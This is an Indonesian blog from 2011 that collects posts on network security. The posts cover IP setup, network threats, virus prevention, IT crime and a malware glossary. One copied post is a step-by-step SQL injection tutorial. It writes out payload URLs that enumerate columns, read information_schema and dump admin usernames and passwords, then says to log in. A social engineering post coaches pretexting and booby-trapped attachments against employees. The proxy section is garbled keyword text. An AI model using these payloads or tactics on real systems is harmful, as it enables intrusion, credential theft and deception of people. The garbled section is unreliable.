Selasa, 26 Juli 2011

Langkah Konfigurasi IP Pada Debian 4.0

.
1. Langkah Pertama :
  • Masuk ke terminal dahulu (applications – accessories – terminal).
    • Kita ketik su – lalu masukan password anda – lalu enter.

Selasa, 24 Mei 2011

Hacking Website dengan tekhnik SQL Injection

hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------

begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC


oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

referensi :
. http://jasakom.com
. http://ezine.echo.or.id
. http://cruzenaldo.co.cc
. http://students.ee.itb.ac.id

SOCIAL ENGINEERING

Social engineering adalah pemerolehan informasi atau maklumat rahasia/sensitif dengan cara menipu pemilik informasi tersebut. Social engineering umumnya dilakukan melalui telepon atau Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu.
Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun. Seperti metoda hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.

Faktor utama  

Di balik semua sistem keaman dan prosedur-prosedur pengamanan yang ada masih terdapat faktor lain yang sangat penting, yaitu : manusia.
Pada banyak referensi, faktor manusia dinilai sebagai rantai paling lemah dalam sebuah sistem keamanan. Sebuah sistem keamanan yang baik, akan menjadi tidak berguna jika ditangani oleh administrator yang kurang kompeten. Selain itu, biasanya pada sebuah jaingan yang cukup kompleks terdapat banyak user yang kurang mengerti masalah keamanan atau tidak cukup peduli tentang hal itu. Ambil contoh di sebuah perusahaan, seorang network admin sudah menerapkan kebijakan keamanan dengan baik, namun ada user yang mengabaikan masalah kemanan itu. Misalnya user tersebut menggunakan password yang mudah ditebak, lupa logout ketika pulang kerja, atau dengan mudahnya memberikan akses kepada rekan kerjanya yang lain atau bahkan kepada kliennya. Hal ini dapat menyebabkan seorang penyerang memanfaatkan celah tersebut dan mencuri atau merusak datadata penting perusahaan.
Atau pada kasus di atas, seorang penyerang bisa berpura-pura sebagai pihak yang berkepentingan dan meminta akses kepada salah satu user yang ceroboh tersebut. Tindakan ini digolongkan dalam Social Engineering

Metode

Metode pertama adalah metode yang paling dasar dalam social engineering, dapat menyelesaikan tugas penyerang secara langsung yaitu, penyerang tinggal meminta apa yang diinginkannya: password, akses ke jaringan, peta jaringan, konfigurasi sistem, atau kunci ruangan. Memang cara ini paling sedikit berhasil, tapi bisa sangat membantu dalam menyelesaikan tugas penyerang.
Cara kedua adalah dengan menciptakan situasi palsu dimana seseorang menjadi bagian dari situasi tersebut. Penyerang bisa membuat alasan yang menyangkut kepentingan pihak lain atau bagian lain dari perusahaan itu, misalnya. Ini memerlukan kerja lanjutan bagi penyerang untuk mencari informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Ini juga berarti kita tidak harus selalu berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.
Sebagai contoh seperti ini: seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim. Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target. Contoh lain, bisa berpura-pura sedang mengadakan survei hardware dari vendor tertentu, dari sini bisa diperoleh informasi tentang peta jaringan, router, firewall atau komponen jaringan lainnya.
Cara yang populer sekarang adalah melalui e-mail, dengan mengirim e-mail yang meminta target untuk membuka attachment yang tentunya bisa kita sisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.
Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa dengan tindakan yang dilakukan akan menyebabkan sedikit atu tanpa efek buruk sama sekali. Atau target merasa bahwa dengan memenuhi keinginan penyerang-yang berpura-pura akan membuat dia dipuji atau mendapat kedudukan ynag lebih baik. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain. Jadi kita bisa fokuskan untuk membujuk target secara sukarela membantu kita, tidak dengan memaksanya. Selanjutnya kita bisa menuntun target melakukan apa yang kita mau, target yakin bahwa dirinya yang memegang kontrol atas situasi tersebut. Target merasa bahwa dia membuat keputusan yagn baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya. Semakin sedikit konflik semakin baik.
Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan, sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

Senin, 23 Mei 2011

Ancaman Keamanan Jaringan

Memahami Berbagai Jenis Ancaman Keamanan Jaringan Pada Organisasi Anda
Salah satu pusat perhatian dalam keamanan jaringan adalah mengendalikan access terhadap resources jaringan. Bukan saja sekedar mengontrol siapa saja yang boleh mengakses resources jaringan yang mana, pengontrolan akses ini juga harus memanage bagaimana si subject (user, program, file, computer dan lainnya) berinteraksi dengan object-2 (bisa berupa sebuah file, database, computer, dll atau lebih tepatnya infrastruktur jaringan kita).
Prinsip keamanan jaringan
Sebelum memahami berbagai macam ancaman keamanan jaringan, anda perlu memahami prinsip keamanan itu sendiri.
1. Kerahasiaan (confidentiality), dimana object tidak di umbar atau dibocorkan kepada subject yang tidak seharusnya berhak terhadap object tersebut, atau lazim disebut tidak authorize.
2. Integritas (Integrity), bahwa object tetap orisinil, tidak diragukan keasliannya, tidak dimodifikasi dalam perjalanan nya dari sumber menuju penerimanya.
3. Ketersediaan (Availability), dimana user yang mempunyai hak akses atau authorized users diberi akses tepat waktu dan tidak terkendala apapun.
Prinsip keamanan ini lazim disebut segitiga CIA (Confidentiality, Integrity, Availability). Dan salah satu goal utama dari pengendalian akses adalah untuk menjaga jangan sampai ada yang tidak authorize mengakses objek-2 seperti jaringan; layanan-2; link komunikasi; komputer atau system infrastruktur jaringan lainnya oleh apa yang kita sebut sebagai ancaman keamanan jaringan.
Dalam perjalanan anda untuk membangun suatu system kemanan jaringan, salah satu prosesnya adalah menilai resiko keamanan dalam organisasi anda. Akan tetapi terlebih dahulu anda perlu juga memahami berbagai jenis ancaman keamanan jaringan.
Ancaman keamanan jaringan dan metoda yang umum Dipakai
Berikut ini adalah berbagai macam kelas serangan atau metoda serangan terhadap keamanan infrastruktur jaringan anda.
Memaksa masuk dan kamus password
Jenis ancaman keamanan jaringan ini lebih umum disebut sebagai Brute Force and Dictionary, serangan ini adalah upaya masuk ke dalam jaringan dengan menyerang database password atau menyerang login prompt yang sedang active. Serangan masuk paksa ini adalah suatu upaya untuk menemukan password dari account user dengan cara yang sistematis mencoba berbagai kombinasi angka, huruf, atau symbol. Sementara serangan dengan menggunakan metoda kamus password adalah upaya menemukan password dengan mencoba berbagai kemungkinan password yang biasa dipakai user secara umum dengan menggunakan daftar atau kamus password yang sudah di-definisikan sebelumnya.
Untuk mengatasi serangan keamanan jaringan dari jenis ini anda seharusnya mempunyai suatu policy tentang pemakaian password yang kuat diantaranya untuk tidak memakai password yang dekat dengan kita missal nama, nama anak, tanggal lahir dan sebagainya. Semakin panjang suatu password dan kombinasinya semakin sulit untuk diketemukan. Akan tetapi dengan waktu yang cukup, semua password dapat diketemukan dengan metoda brute force ini.
Denial of Services (DoS)
Deniel of Services (DoS) ini adalah salah satu ancaman keamanan jaringan yang membuat suatu layanan jaringan jadi mampet, serangan yang membuat jaringan anda tidak bisa diakses atau serangan yang membuat system anda tidak bisa memproses atau merespon terhadap traffic yang legitimasi atau permintaan layanan terhadap object dan resource jaringan. Bentuk umum dari serangan Denial of Services ini adalah dengan cara mengirim paket data dalam jumlah yang sangat bersar terhadap suatu server dimana server tersebut tidak bisa memproses semuanya. Bentuk lain dari serangan keamanan jaringan Denial of Services ini adalah memanfaatkan telah diketahuinya celah yang rentan dari suatu operating system, layanan-2, atau applikasi-2. Exploitasi terhadap celah atau titik lemah system ini bisa sering menyebabkan system crash atau pemakaian 100% CPU.
Tidak semua Denial of Services ini adalah merupakan akibat dari serangan keamanan jaringan. Error dalam coding suatu program bisa saja mengakibatkan kondisi yang disebut DoS ini. Disamping itu ada beberapa jenis DoS seperti:
1. Distributed Denial of Services (DDoS), terjadi saat penyerang berhasil meng-kompromi beberapa layanan system dan menggunakannya atau memanfaatkannya sebagai pusat untuk menyebarkan serangan terhadap korban lain.
2. Ancaman keamanan jaringan Distributed refelective deniel of service (DRDoS) memanfaatkan operasi normal dari layanan Internet, seperti protocol-2 update DNS dan router. DRDoS ini menyerang fungsi dengan mengirim update, sesi, dalam jumlah yang sangat besar kepada berbagai macam layanan server atau router dengan menggunakan address spoofing kepada target korban.
3. Serangan keamanan jaringan dengan membanjiri sinyal SYN kepada system yang menggunakan protocol TCP/IP dengan melakukan inisiasi sesi komunikasi. Seperti kita ketahui, sebuah client mengirim paket SYN kepada server, server akan merespon dengan paket SYN/ACK kepada client tadi, kemudian client tadi merespon balik juga dengan paket ACK kepada server. Ini proses terbentuknya sesi komunikasi yang disebut Three-Way handshake (bahasa teknis kita apa yach …masak jabat tangan tiga jalan????he..he..) yang dipakai untuk transfer data sampai sesi tersebut berakhir. Kebanjiran SYN terjadi ketika melimpahnya paket SYN dikirim ke server, tetapi si pengirim tidak pernah membalas dengan paket akhir ACK.
4. Serangan keamanan jaringan dalam bentuk Smurf Attack terjadi ketika sebuah server digunakan untuk membanjiri korban dengan data sampah yang tidak berguna. Server atau jaringan yang dipakai menghasilkan response paket yang banyak seperti ICMP ECHO paket atau UDP paket dari satu paket yang dikirim. Serangan yang umum adalah dengan jalan mengirimkan broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan menerima paket broadcast ini, sehingga setiap node akan merespon balik dengan satu atau lebih paket respon.
5. Serangan keamanan jaringan Ping of Death, adalah serangan ping yang oversize. Dengan menggunakan tool khusus, si penyerang dapat mengirimkan paket ping oversized yang banyak sekali kepada korbannya. Dalam banyak kasus system yang diserang mencoba memproses data tersebut, error terjadi yang menyebabkan system crash, freeze atau reboot. Ping of Death ini tak lebih dari semacam serangan Buffer overflow akan tetapi karena system yang diserang sering jadi down, maka disebut DoS attack.
6. Stream Attack terjadi saat banyak jumlah paket yang besar dikirim menuju ke port pada system korban menggunakan sumber nomor yang random.
Spoofing
Spoofing adalah seni untuk menjelma menjadi sesuatu yang lain. Spoofing attack terdiri dari IP address dan node source atau tujuan yang asli atau yang valid diganti dengan IP address atau node source atau tujuan yang lain.
Serangan Man-in-the-middle
Serangan keamanan jaringan Man-in-the-middle (serangan pembajakan) terjadi saat user perusak dapat memposisikan diantara dua titik link komunikasi.
  • Dengan jalan mengkopy atau menyusup traffic antara dua party, hal ini pada dasarnya merupakan serangan penyusup.
  • Para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau mekanisme store-and-forwad (simpan dan lepaskan).
Para penyerang ini tidak tampak pada kedua sisi link komunikasi ini dan bisa mengubah isi dan arah traffic. Dengan cara ini para penyerang bisa menangkap logon credensial atau data sensitive ataupun mampu mengubah isi pesan dari kedua titik komunikasi ini.
Spamming
Spam yang umum dijabarkan sebagai email yang tak diundang ini, newsgroup, atau pesan diskusi forum. Spam bisa merupakan iklan dari vendor atau bisa berisi kuda Trojan. Spam pada umumnya bukan merupakan serangan keamanan jaringan akan tetapi hampir mirip DoS.
Sniffer
Suatu serangan keamanan jaringan dalam bentuk Sniffer (atau dikenal sebagai snooping attack) merupakan kegiatan user perusak yang ingin mendapatkan informasi tentang jaringan atau traffic lewat jaringan tersebut. suatu Sniffer sering merupakan program penangkap paket yang bisa menduplikasikan isi paket yang lewat media jaringan kedalam file. Serangan Sniffer sering difokuskan pada koneksi awal antara client dan server untuk mendapatkan logon credensial, kunci rahasia, password dan lainnya.
Crackers
Ancaman keamanan jaringan Crackers adalah user perusak yang bermaksud menyerang suatu system atau seseorang. Cracker bisasanya termotivasi oleh ego, power, atau ingin mendapatkan pengakuan. Akibat dari kegiatan hacker bisa berupa pencurian (data, ide, dll), disable system, kompromi keamanan, opini negative public, kehilangan pasar saham, mengurangi keuntungan, dan kehilangan produktifitas.

Sabtu, 21 Mei 2011

Keamanan Jaringan Proxy

Proxy - FTP and HTTP caching proxy server; HTTPS proxy Untuk keamanan ganti password default [admin@Mikrotik Setelah terkoneksi dengan jaringan Mikrotik dapat Halaman dalam kategori "Keamanan jaringan" Kategori ini memiliki 5 halaman, dari total 5. F. Firewall; K. Kerberos (protokol) O. Open proxy; P. Penapisan paket Produk ini juga berisi fitur-fitur seperti Internet proxy server Artikel dalam kategori "Keamanan jaringan" Ditampilkan 5 halaman yang termasuk dalam kategori ini dari
You have come to this page to find information on artikel keamanan jaringan. Memiliki 5 Halaman Dari Total 5 F Firewall K Kerberos Protokol O Open Proxy Open proxy (proxy terbuka) adalah sebuah proxy server Kategori: Keamanan jaringan | Istilah teknologi informasi dalam Kategori tersembunyi: Artikel yang layak digabungkan | Artikel Tentang Proxy Server dan Proxy Website Proxy server yang lebih menyeluruh terhadap akses jaringan. Proxy server yang berfungsi sebagai sebuah “agen keamanan Artikel Terbaru ► Queue dengan SRC-NAT dan WEB-PROXY (Mikrotik) Load WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan Artikel Terbaru ► Transparent Proxy Server di Mikrotik; Konfigurasi Wifi Memahami Berbagai Jenis Ancaman Keamanan Jaringan Pada Tool-tool jaringan, misalnya firewall dan proxy dokumen-dokumen dan artikel on-line tentang bahaya keamanan dan Mantra, Analis Senior Keamanan Jaringan Artikel Populer IlmuKomputer.Com. Belajar Menjadi Hacker dengan dunia seni, disini kita berbicara seni keamanan jaringan menggunakan teknik / software Firewall dan Proxy

Mencegah Virus

Pengertian Virus
Virus komputer bisa diartikan sebagai program komputer biasa, tetapi memiliki perbedaan yang mendasar dengan program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya.

Kriteria Virus
Suatu program dapat disebut sebagai suatu virus apabila memenuhi 5 kriteria berikut:
1. Kemampuan untuk mendapatkan informasi
2. Kemampuan untuk memeriksa suatu file
3. Kemampuan untuk menggandakan diri dan menularkan diri
4. Kemampuan untuk melakukan manipulasi
5. Kemampuan untuk menyembunyikan diri

Cara Virus Menyebar
Virus layaknya virus biologi, harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui media, diantaranya:

1. Disket, media storage R/W
2. Jaringan (LAN, WAN, dsb)
3. Internet
4. Software yang freeware, shareware atau bahkan bajakan
5. Attachment pada email, transfering file

Penanggulangan Virus Komputer
Semua orang yang bergelut dengan dunia komputer pasti mengenal yang namanya virus komputer. Penyakit yang satu ini memang sangat mengganggu dan meresahkan pengguna komputer. Bagaimana tidak, akibat dampak yang ditimbulkan oleh virus bisa berakibat kepada kerusakan sistem komputer sehingga beberapa program tidak bisa dijalankan lagi. Dampak yang lebih buruk lagi adalah komputer bisa menjadi hang sehingga lumpuh total. Bahkan tidak jarang orang menjadi stress sebab kehilangan file mereka yang sangat berharga dan butuh waktu lama untuk menyelesaikan pekerjaan itu karena dimakan oleh sang virus jahat tersebut.
Bagi orang yang sudah mahir pemrograman komputer, mungkin virus tidak begitu menjadi masalah. Dengan melakukan scanning menggunakan anti virus hal tersebut bisa diatasi dan dengan mengupdate anti virus itu secara rutin sehingga memperkuat proteksi terhadap virus. Tapi bagaimana dengan orang yang sama sekali buta mengenai pemrograman komputer dan yang bisanya hanya mengetik tulisan saja? Tentu virus menjadi momok yang sangat menakutkan bagi mereka. Lalu bagaimanakah cara menanggulangi virus tersebut?

1. Langkah-langkah untuk pencegahan
Gunakan anti virus dengan update terbaru
- Selalu scanning semua media penyimpanan eksternal yang akan digunakan.
- Jika anda terhubung ke internet, cobalah untuk mengkombinasikan antivirus dengan Firewall, Anti-spamming, dsb.
- Selalu waspada terhadap file-file yang mencurigakan, contoh: file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
- Untuk software freeware+shareware, ada baiknya anda mengambilnya dari situs resminya.
- Semampunya menghindari membeli barang bajakan, gunakan sofware-sofware open source.
2. Langkah-langkah apabila telah terinfeksi
- Deteksi dan tentukan di manakah kira-kira sumber virus tersebut, apakah di disket, jaringan email dsb. Jika anda terhubung ke jaringan maka ada baiknya mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel)
- Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda dengan cara:
+ Gejala yang timbul, misal: pesan, file yang corrupt atau hilang dsb
+ Scan dengan antivirus anda, jika anda terkena saat auto protect berjalan, berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda dan mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru.
- Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya, maka usahakan segera untuk mencari dan removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi pengembangan virus tersebut. Hal ini perlu dilakukan apabila anti virus dengan update terbaru anda tidak berhasil memusnahkannya.
- Langkah terburuk. Jika semua hal diatas tidak berhasil, adalah dengan memformat ulang komputer anda

Kejahatan Teknologi Informasi

Dunia teknologi informasi yang berkembang sedemikian cepat sungguh diluar dugaan, tetapi perkembangan ini diikuti pula dengan kejahatan teknologi informasi. Dan karena kejahatan ini pula menyebabkan banyak orang harus membayar mahal untuk mencegahnya dan menaati hukum yang ada.
Apa saja cara-cara untuk mencegah kejahatan komputer :
  1. Memperkuat hukumKini dengan hukum dunia teknologi informasi diperkuat maka setiap orang tidak seenaknya lagi melannggar hukum, karena bisa-bisa digiring sampai ke kantor polisi. Organisasi industri seperti Software Publishers Association (SPA) segera dibentuk setelah maraknya pembajakan perangakat
    lunak dalam sekala besar maupun kecil. (Pembajakan perangkat lunak komersial sekarang merupakan tindak pidana berat, bisa dienjara maksimal 5 tahun dan didenda hingga 250.000 dollar bagi siapa saja yang terbukti memakai peragkat bajakan). Dengan memperkuat hukum ini minimal akan mengurangi resiko kejahatan Teknologi informasi.
  2. CERT : Computer Emergency respose Team
    Pada tahun 1988, setelah internet tersebar luas, Departemen pertahanan AS membentuk CERT. Meskipun lembaga ini tidak mempunyai wewenang untuk menahan atau mengadili, CERT menyediakan informasi internasional  dan layanan seputar keamanan bagi para pengguna internet. CERT hadr sebagai
    pendamping pihak yang diserang, membantu mengatasi penggangu, dan mengevaluasi sistem yang telah megalami serangan untuk melindunginya dari gangguan dimasa yang akan datang.
  3. Alat pendeteksi kecurangan perangkat lunak deteksi berbasis aturan. Dalam teknik ini pengguna, semisal  pedagang membuat file negatif yang memuat kriteria yang harus dipenuhi oleh setiap transaksi. Kriteria ini meliputi nomor kartu kredit yang dicuri dan juga batas harganya, kecocokan alamat rekening pemegang kartu dan alamat pengiriman, dan peringatan jika satu item dipesan dalam jumlah besar.
    Perangkat Lunak Model Prediktif-Statistik
    Dalam teknik ini dilakukan pemeriksaan pada berton-ton data dari transaksi sebelumnya. Tujuannya untuk membuat diskripsi matematis tentang kecurangan transaksi yang biasa terjadi. Perangkat lunak ini menghitung pesanan yang masuk menurut skala rasio yang didasarkan pada kemiripan profil
    kecurangan. Semisal jika beberapa pencuri yang telah mendapatkan nomor telpon perusahaan anda dengan cara menyadap pembicaraan - melakukan pembicaraan kesuatu negara padahal anda tidak pernah melakukannya, maka perangkat lunak AT&T akan melakukan aktivitas yang tidak biasa lalu
    memanggil anda untuk mengetahui apakah anda yang melakukan panggilan tersebut.
    Perangkat Lunak Manajemen Internet Pegawai (EIM)
    Program yang dibuat oleh Websense, SurfControl, dan Smartfilter yang digunakan untuk memantau berapa banyak waktu yang dihabiskan para manusia yg diweb dan untuk memblokir akses ke situs judi atau porno perangkat lunak penyaring Internet
Beberapa perusahaan menggunakan perangkat lunak penyaring filter khusus untuk memblok akses ke pornogafi, download music bootleg, dan situs Internet lain yang tidak dikehendaki yang kemungkinan akan diakses pengawasan secara elektronik perusahaan menggunakan berbagai jenis pengawas elektronik yang menyertakan teknologi pemantau audio dan visual, membaca email dan blog, dan merekam keystroke.
Dengan berbagai cara pencegahan diatas memang akan mengurangi kejahatan di dunia maya, namun semuanya itu kembali kepada kita sebagai pengguna Teknologi Informasi, selama kita semua masih memakai cara-cara dan etika yang benar pasti perkembangan IT akan terus melaju secara positf. Dan sampai sekarang metode pencegahan masih terus dikembangkan dengan beraneka ragam dan akan terus berkembang sesuai dengan tingkat perkembangan Teknologi Informasi.

Adware, Spyware, Worm & Trojan 3

Dunia maya tidak lepas dari kutu digital / pests program. Bila Virus yang mengacaukan sistem computer sudah bermutasi menjadi alat penyerang sudah menjadi hal biasa.
Tetapi saat ini yang lebih menjengkelkan saat ini adalah para kutu yang disebut dengan Adware, Spyware, Worm dan Trojan.
Disebut sebagai kutu internet karena sifatnya yang menganggu. Dan membuat gatal sebuah computer sampai menjadi parasit yang terus membebani sistem sebuah computer sampai network dan koneksi internet. Bila anda pertama kali merasakan computer begitu cepat, setelah beberapa waktu anda mengunakan internet maka computer perlahan lahan menjadi lambat. Kemungkinan kelambatan computer bisa disebabkan oleh salah satu jenis program Malware tersebut.
Untuk mudahnya, program Malware dibagi sesuai fungsi seperti pada tabel dibawah ini
Kategori Malware
Kegiatan yang dilakukan
Adware
Adware ada iklan yang dimasukan secara tersembunyi oleh pembuat program. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
Browser Helper Object
BHO adalah pembajak yang menampilkan link pada toolbar. Umumnya BHO melakukan kegiatan mata mata untuk mencatat kegiatan netter, disamping tampilan browser anda ditambahkan toolbar khusus
Browser Hijackers
Browser anda dimasukan link tertentu. Dan memaksa anda masuk pada sebuah situs walaupun anda sudah benar mengetik alamat situs yang anda inginkan. Artinya, program Browser anda secara tidak langsung sudah dibajak dan diarahkan ke situs tertentu
Dialer
Memasukan fungsi otomatis untuk koneksi internet, bahkan secara diam diam program dapat aktif sendiri. Untuk kerugian, tagihan telepon anda mendadak membengkak
Drive-by downloads
Program yang di install tetapi tidak diketahui oleh pemilik computer. Cara ini memanfaatkan kelemahan pada IE.
Homepage Hijacking
Ini paling banyak dilakukan oleh pembuat Malware. Dengan menganti alamat homepage pada default browser dan tidak dapat dirubah walaupun anda sudah melakukan set ulang.
Keylogger
Program yang masuk dan mencatat apa yang anda ketik. Dan mengirim data ke server pembuat Malware.
Retrospies
Program Malware yang sengaja mencoba mematikan anti spyware.
Scumware
Diartikan sebagai program yang tidak dinginkan dan masuk ke computer tanpa ijin
Search Hijackers
Adalah kontrol yang dilakukan sebuah search engine pada browser. Bila salah menulis alamat, program biasanya menampilkan begitu banyak pop up iklan yang tidak karuan.
Surveillance Software
Salah satu program yang berbahaya. Karena mencatat kegiatan pada sebuah computer termasuk data penting, password dan lainnya. Program ini sangat pintar , dan baru mengirim data setelah seseorang selesai melakukan aktifitas.
Thiefware
Difungsikan untuk mengarahkan pengunjung situs dan mengarahkan ke situs lain yang mereka kehendaki. Cara ini tidak ilegal tetapi dinilai kasar
Trojan Horse
Adalah program dikategorikan sebagai virus. Fungsinya untuk mengkontrol computer yang terinfeksi
Dari nama nama diatas, perbedaan antara virus dengan kutu computer membuat program malware sulit dibedakan. Keduanya sama sama memiliki sifat yang kita tidak inginkan. Virus , Worm virus termasuk Trojan dapat dihadapi dengan program khusus yaitu AntiVirus. Sedangkan perkembangan kutu Adware dan Spyware internet harus dihadapi dengan anti spyware dan anti adware.
Walaupun agak sulit membedakan untuk dimasukan kedalam kategori apakah sebuah program malware. Dibawah ini adalah beberapa kategori dari penganggu computer yang ada saat ini. Untuk artikel dibawah ini, seluruh kategori pada tabel diatas dimasukan dalam kata program Malware.
Kategori untuk Trojan , Worm dan Hijacker
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh.
Worm virus adalah virus. Kategori Worm dikelompokan sebagai si cacing internet. Fungsi utamanya untuk melakukan serangan dan menyebar serta mengambil data dan mengirim email secara diam diam dan acak. Tetapi saat ini juga dimanfaatkan untuk tujuan tertentu, misalnya mengirim data pada sebuah computer tanpa diketahui oleh pemiliknya. Batasan Worm untuk tujuan komersil atau non komersial menjadi tipis. Karena program dibuat untuk mengambil data dan dikirim ke tempat tertentu
Untuk Hijacker dimana seseorang masuk kesebuah situs, dan secara tidak sengaja mengclick sesuai permintaan pada tampilan situs. Disitulah program Hijacker bekerja, dan memasuki fungsi browser anda agar dikontrol sesuai keinginan mereka.
Spyware
Berbeda dengan Spyware yang berkonotasi dengan fungsi Spy atau memata matai. Spyware adalah program yang diam diam telah masuk kedalam computer dan mengambil data. Tujuan awal dari pembuatan Spyware adalah mencari data dari pemakai internet dan mencatat kebiasaan seseorang dalam menyelusuri dunia maya. Sayangnya, perkembangan Spyware tersebut dirusak dengan munculnya pencuri yang dapat mengambil data pada sebuah computer.
